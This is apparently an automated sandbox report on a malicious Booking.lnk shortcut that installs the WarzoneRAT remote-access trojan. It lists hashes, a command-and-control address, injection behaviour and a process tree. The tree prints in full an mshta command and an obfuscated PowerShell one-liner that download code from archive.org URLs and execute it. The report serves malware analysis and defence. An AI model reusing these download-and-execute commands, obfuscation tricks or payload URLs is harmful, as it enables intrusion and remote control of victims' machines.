Analysis

Max time kernel: 65s
Max time network: 149s
Platform: windows10_x64
Resource: win10v20210408
Submitted: 17-07-2021 16:04

Tasks:
- Static task static1
- Behavioral task behavioral1: Sample Booking.lnk, Resource win7v20210410
- Behavioral task behavioral2: Sample Booking.lnk, Resource win10v20210408
General

Target: Booking.lnk
Size: 1KB
MD5: c19da592366d6c173dee901add093e8e
SHA1: ddd038c49bee36557cd203b581948e98a5e787a1
SHA256: ab915bb1e45aba4cbbb762e4bac31510539b4a418d8466839bf6e4c1b40b87a2
SHA512: 7d9c0d3aa4b8907598f3c0982b32cc35d9afb816de8e350aefac3993cfbcd0e2b3c84ce59d99b9de239b20a10179ea6db9370aa53c89b3c3a1e4c05db8bdd7b3
Malware Config

Extracted URL: https://ia801509.us.archive.org/29/items/enc-kkkkkkkkkkkooooooookkkkkkkkkkk-2435467568790/Enc_kkkkkkkkkkkooooooookkkkkkkkkkk_2435467568790.txt
Extracted URL: https://ia601504.us.archive.org/1/items/all-kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk/ALL_kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk.txt
Extracted config (warzonerat): 103.147.184.73:5719
Signatures

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

Warzone RAT Payload (3 IoCs)
  resource | yara_rule
  behavioral2/memory/776-149-0x0000000000400000-0x000000000041D000-memory.dmp | warzonerat
  behavioral2/memory/776-150-0x0000000000405738-mapping.dmp | warzonerat
  behavioral2/memory/776-154-0x0000000000400000-0x000000000041D000-memory.dmp | warzonerat

Blocklisted process makes network request (5 IoCs)
  Processes: mshta.exe, powershell.exe
  flow | pid | process
  8 | 2484 | mshta.exe
  10 | 2484 | mshta.exe
  12 | 2484 | mshta.exe
  16 | 2260 | powershell.exe
  22 | 2260 | powershell.exe

Sets DLL path for service in the registry (2 TTPs)

Loads dropped DLL (1 IoC)
  Processes: svchost.exe
  pid | process
  1724 | svchost.exe

Suspicious use of SetThreadContext (1 IoC)
  Processes: powershell.exe
  description | pid | process | target process
  PID 2260 set thread context of 776 | 2260 | powershell.exe | aspnet_compiler.exe

Drops file in Program Files directory (3 IoCs)
  Processes: aspnet_compiler.exe, svchost.exe
  description | ioc | process
  File created | C:\Program Files\Microsoft DN1\sqlmap.dll | aspnet_compiler.exe
  File created | C:\Program Files\Microsoft DN1\rdpwrap.ini | aspnet_compiler.exe
  File opened for modification | \??\c:\program files\microsoft dn1\rdpwrap.txt | svchost.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (7 IoCs)
  Processes: powershell.exe, svchost.exe
  pid | process
  2260 | powershell.exe
  2260 | powershell.exe
  2260 | powershell.exe
  1724 | svchost.exe
  1724 | svchost.exe
  1724 | svchost.exe
  1724 | svchost.exe

Suspicious behavior: LoadsDriver (1 IoC)
  pid | process
  620 | (not recorded)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: powershell.exe, aspnet_compiler.exe, svchost.exe
  description | pid | process
  Token: SeDebugPrivilege | 2260 | powershell.exe
  Token: SeDebugPrivilege | 776 | aspnet_compiler.exe
  Token: SeAuditPrivilege | 1724 | svchost.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  Processes: aspnet_compiler.exe
  pid | process
  776 | aspnet_compiler.exe

Suspicious use of WriteProcessMemory (15 IoCs)
  Processes: cmd.exe, mshta.exe, powershell.exe
  description | pid | process | target process
  PID 652 wrote to memory of 2484 | 652 | cmd.exe | mshta.exe
  PID 652 wrote to memory of 2484 | 652 | cmd.exe | mshta.exe
  PID 2484 wrote to memory of 2260 | 2484 | mshta.exe | powershell.exe
  PID 2484 wrote to memory of 2260 | 2484 | mshta.exe | powershell.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
  PID 2260 wrote to memory of 776 | 2260 | powershell.exe | aspnet_compiler.exe
Processes

Process tree (indentation shows parent/child depth; the bullets under each process are the signatures it triggered):

C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Booking.lnk
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" "https://ia801509.us.archive.org/29/items/enc-kkkkkkkkkkkooooooookkkkkkkkkkk-2435467568790/Enc_kkkkkkkkkkkooooooookkkkkkkkkkk_2435467568790.txt"
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601504.us.archive.org/1/items/all-kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk/ALL_kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        - Drops file in Program Files directory
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx

\??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k networkservice -s TermService

C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -s TermService
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Downloads

Dropped files:

\??\c:\program files\microsoft dn1\rdpwrap.ini (0-byte file: these are the well-known hashes of empty input)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\c:\program files\microsoft dn1\sqlmap.dll
  MD5: 461ade40b800ae80a40985594e1ac236
  SHA1: b3892eef846c044a2b0785d54a432b3e93a968c8
  SHA256: 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
  SHA512: 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

\Program Files\Microsoft DN1\sqlmap.dll (same file as above, recorded under a second path)
  MD5: 461ade40b800ae80a40985594e1ac236
  SHA1: b3892eef846c044a2b0785d54a432b3e93a968c8
  SHA256: 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
  SHA512: 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Memory dumps:

  memory/776-149-0x0000000000400000-0x000000000041D000-memory.dmp (116KB)
  memory/776-154-0x0000000000400000-0x000000000041D000-memory.dmp (116KB)
  memory/776-150-0x0000000000405738-mapping.dmp
  memory/2260-126-0x00000150816E0000-0x00000150816E2000-memory.dmp (8KB)
  memory/2260-148-0x00000150824B0000-0x00000150824BE000-memory.dmp (56KB)
  memory/2260-136-0x00000150816E6000-0x00000150816E8000-memory.dmp (8KB)
  memory/2260-130-0x00000150824E0000-0x00000150824E1000-memory.dmp (4KB)
  memory/2260-128-0x00000150816E3000-0x00000150816E5000-memory.dmp (8KB)
  memory/2260-125-0x0000015082330000-0x0000015082331000-memory.dmp (4KB)
  memory/2260-116-0x0000000000000000-mapping.dmp
  memory/2484-114-0x0000000000000000-mapping.dmp